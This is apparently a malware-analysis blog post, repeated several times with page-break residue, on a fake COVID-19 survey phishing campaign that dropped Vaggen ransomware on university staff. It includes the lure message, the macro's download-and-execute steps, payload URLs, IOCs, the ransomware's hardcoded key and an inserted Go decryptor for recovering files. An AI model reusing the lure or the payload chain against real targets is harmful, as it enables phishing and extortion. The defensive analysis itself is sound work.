Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 578 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 579 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 580 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 581 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 582 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 583 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 584 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 585 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 586 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 587 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 588 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to see whether it was successful (the return value would be the task ID of the executed application)\r\nIf successful, it sends a GET HTTP request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET HTTP request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -> main_enumDir\r\nmain_ELDBJORT -> main_encryptFile\r\nmain_SPRINGA -> main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.\r\nThe content of the output file (with the .VAGGEN extension) consists of:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
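The .VAGGEN layout described above (12-byte nonce, ciphertext, 16-byte GCM tag) together with the hardcoded AES-256 key is all a recovery tool needs. The Go program below is an added example, not code from the post or from Malwarebytes: it parses that layout, refuses to overwrite an existing plaintext, restores a directory tree with filepath.Walk, and includes an assumed SealTestVector helper that builds a constructed sample so it runs without a real encrypted file.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// .VAGGEN layout described in the post: [12-byte nonce][ciphertext][16-byte GCM tag].
const (
	vaggenExt  = ".VAGGEN"
	nonceSize  = 12
	gcmTagSize = 16
	vaggenKey  = "du_tar_mitt_hjart_mina_pengarna0" // key quoted in the post: 32 bytes, so AES-256
)

// newGCM builds AES-256-GCM with Go's defaults (12-byte nonce, 16-byte tag), as gcm.Seal uses.
func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// DecryptVaggen parses one blob. gcm.Seal appends the tag to the ciphertext, so the bytes
// after the nonce are exactly what gcm.Open expects; a wrong key or a flipped byte fails auth.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	if len(blob) < nonceSize+gcmTagSize {
		return nil, fmt.Errorf("vaggen: blob of %d bytes is shorter than nonce + tag", len(blob))
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// RestoreFile writes the plaintext of a .VAGGEN file under the original name. The encrypted
// copy is kept for forensics and an existing plaintext is never overwritten.
func RestoreFile(path string, key []byte) (string, error) {
	out := strings.TrimSuffix(path, vaggenExt)
	if _, err := os.Stat(out); err == nil {
		return "", fmt.Errorf("%s: refusing to overwrite existing file", out)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	pt, err := DecryptVaggen(blob, key)
	if err != nil {
		return "", fmt.Errorf("%s: %w", path, err)
	}
	return out, os.WriteFile(out, pt, 0o600)
}

// RestoreTree walks root with filepath.Walk (the API the malware's encryption callback hangs
// off) and restores every .VAGGEN file; a file that fails is recorded, not fatal.
func RestoreTree(root string, key []byte) (restored int, failed []string, err error) {
	err = filepath.Walk(root, func(path string, info os.FileInfo, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if info.IsDir() || !strings.HasSuffix(path, vaggenExt) {
			return nil
		}
		if _, rerr := RestoreFile(path, key); rerr != nil {
			failed = append(failed, rerr.Error())
			return nil
		}
		restored++
		return nil
	})
	return restored, failed, err
}

// SealTestVector builds a blob in the same layout from constructed plaintext so the decryptor
// can be exercised without a real sample (assumed test helper, not code from the binary).
func SealTestVector(pt, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return append(nonce, gcm.Seal(nil, nonce, pt, nil)...), nil
}

func main() {
	dir, _ := os.MkdirTemp("", "vaggen-demo") // constructed sample tree, removed afterwards
	defer os.RemoveAll(dir)
	blob, _ := SealTestVector([]byte("constructed sample document"), []byte(vaggenKey))
	_ = os.WriteFile(filepath.Join(dir, "report.docx"+vaggenExt), blob, 0o600)
	n, failed, err := RestoreTree(dir, []byte(vaggenKey))
	fmt.Printf("restored=%d failed=%v err=%v\n", n, failed, err)
}
```

Because the tag is authenticated, a failure from gcm.Open on a real sample means the file was not produced with this key or has been damaged, not that the layout was misparsed.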
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 613 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 614 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 615 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 616 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 617 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 618 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 619 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 620 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 621 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 622 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 623 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 624 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 625 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam coming from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, less than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

